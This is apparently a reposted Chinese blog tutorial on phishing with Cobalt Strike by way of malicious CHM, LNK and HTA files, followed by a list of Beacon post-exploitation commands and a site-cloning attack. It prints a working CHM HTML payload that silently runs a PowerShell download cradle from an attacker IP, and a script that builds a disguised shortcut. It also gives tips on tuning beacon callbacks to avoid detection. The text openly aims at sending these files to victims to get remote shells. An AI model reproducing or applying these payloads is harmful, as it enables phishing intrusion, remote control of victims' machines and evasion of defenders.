Cobalt Strike之CHM、LNK、HTA钓鱼
如果手里没几个0day,就不要指望通过应用漏洞和系统漏洞打进去了,毕竟层层防护很难突破,与其不停的用头撞墙 不如研究下钓鱼吧
CHM钓鱼
CHM介绍
CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。
利用CHM钓鱼主要原因是因为该文档可以执行cmd命令
这里制作CHM需要用到一个工具就是 EasyCHM
CHM制作过程:
创建一个文件夹(名字随意),在文件夹里面再创建两个文件夹(名字随意)和一个index.html文件,在两个文件夹内部创建各创建一个index.html文件。
先将下列代码复制到根文件夹中的index.html中。
<html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',calc.exe'><PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>
打开我们的EasyCHM工具
后点击新建
然后导入自己创建的文件夹,点击确定后再点击编译,在弹出的对话框中点击生成CHM按钮
它会给你生产一个CHM文件,给别人发过去,一旦点击就会给弹出计算机
生产钓鱼文件
启动Cobalt Strike,点击attacks——>web Drive by——>scripted web Delivery在弹出的对话框中将type类型设置为powershell然后单击launch按钮
再用代码将上面创建的根文件夹中的index.html代码中的calc.exe替换掉。
<html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.209.151:81/aa'))"><PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>
生产CHM发送给别人,点击后获得反弹的shell
LNK钓鱼
lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。
lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
先做个简单的powershell生产图标:
创建个txt文本写入下面代码然后改文件后缀名为.ps1。
cmd /c calc.exe右键文件powershell运行后会弹出计算器
钓鱼方法:
首先通过Cobalt Strike的attacks——>web Drive by——>scripted web Delivery
tpye类型为powershell,然后单机launch。生产代码。
还记的上面做的那个简单的powershell么,后缀改回txt,将生成的代码替换掉calc.exe
将下面的powershell代码写入.ps1文件,右键运行powershell。
$file = Get-Content "test.txt"$WshShell = New-Object -comObject WScript.Shell$Shortcut = $WshShell.CreateShortcut("test.lnk")$Shortcut.TargetPath = "%SystemRoot%system32cmd.exe"$Shortcut.IconLocation = "%SystemRoot%System32Shell32.dll,21"$Shortcut.Arguments = ' '+ $file$Shortcut.Save()
生成test.lnk文件,而且图标改了(powershell执行文件要和test.txt要在一个目录下,这个图标所在位置就在%SystemRoot%System32Shell32.dll目录下)
后将test.lnk发送给他人,获得反弹shell。
HTA钓鱼
HTA是HTML Application的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件。
HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多,它具有桌面程序的所有权限。
就是一个html应用程序,双击就能运行。
Cobalt Strike,attacks——>packages——>HTML application
选择powershell然后单机generate,选择保存路径。
将生成的.hta文件发送给别人,点击后获得shell
后渗透阶段
相信你已经能拿到一个beacon的shell了。
下面是一些基本的使用命令,但是cs监听器对中文支持并不友好,会对中文产生乱码。
help 查看beacon shell所有内置命令帮助,如果想查看指定命令的用法,可以这样,eg: help checkin
note 给当前目录机器起个名字, eg: note beacon-shell
cd 在目标系统中切换目录,注意在win系统中切换目录要用双反斜杠,或者直接用'/' eg: cd c:\
mkdir 新建目录, eg: mkdir d:\beacon
rm 删除文件或目录, eg: rm d:\beacon
upload 上传文件到目标系统中
download 从目标系统下载指定文件,eg: download C:\Users\win7cn\Desktop\putty.exe
cancel 取消下载任务,比如,一个文件如果特别大,下载可能会非常耗时,假如中途你不想继续下了,就可以用这个取消一下
shell 在目标系统中执行指定的cmd命令, eg: shell whoami
getuid 查看当前beacon 会话在目标系统中的用户权限,可能需要bypassuac或者提权
pwd 查看当前在目录系统中的路径
ls 列出当前目录下的所有文件和目录
drives 列表出目标系统的所有分区[win中叫盘符]
ps 查看目标系统当前的所有的进程列表
kill 杀掉指定进程, eg: kill 4653
sleep 10 指定被控端休眠时间,默认60秒一次回传,让被控端每10秒来下载一次任务,实际中频率不宜过快,容易被发现,80左右一次即可
jobs 列出所有的任务列表,有些任务执行时间可能稍微较长,此时就可以从任务列表中看到其所对应的具体任务id,针对性的清除
jobkill 如果发现任务不知是何原因长时间没有执行或者异常,可尝试用此命令直接结束该任务, eg: jobkill 1345
clear 清除beacon内部的任务队列
checkin 强制让被控端回连一次
exit 终止当前beacon 会话
ctrl + k 清屏
有些可能会触发敏感api导致防护报警,另外进程注入,被控端可能感到非常明显的卡顿,工具也有许多不完善的地方
网站克隆
Cobalt Strike还能够实现网站克隆
cotalt strike能够快速复制目标网站前端页面,并且复制相识度极高
cotalt strike同时还可以在复制的网站中插入恶意代码,如果本地浏览器带有漏洞的用户,可以直接控制目标机器。
点击attacks——>Web Drive-by——>Clone site
-
Clone URL:克隆目标网站的URL(如果网站不是80端口的话域名后得跟上端口号。)
-
注意问题:URL需要添加http协议和端口(81)
-
Local URL:本地克隆路径
-
Local Host:本地主机IP
-
Local Port:本地端口
-
Attack:克隆后目标网站执行脚本,如:flash漏洞
作者:卿's Blog
原文链接:https://blog.csdn.net/qq_17204441/article/details/90436481
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论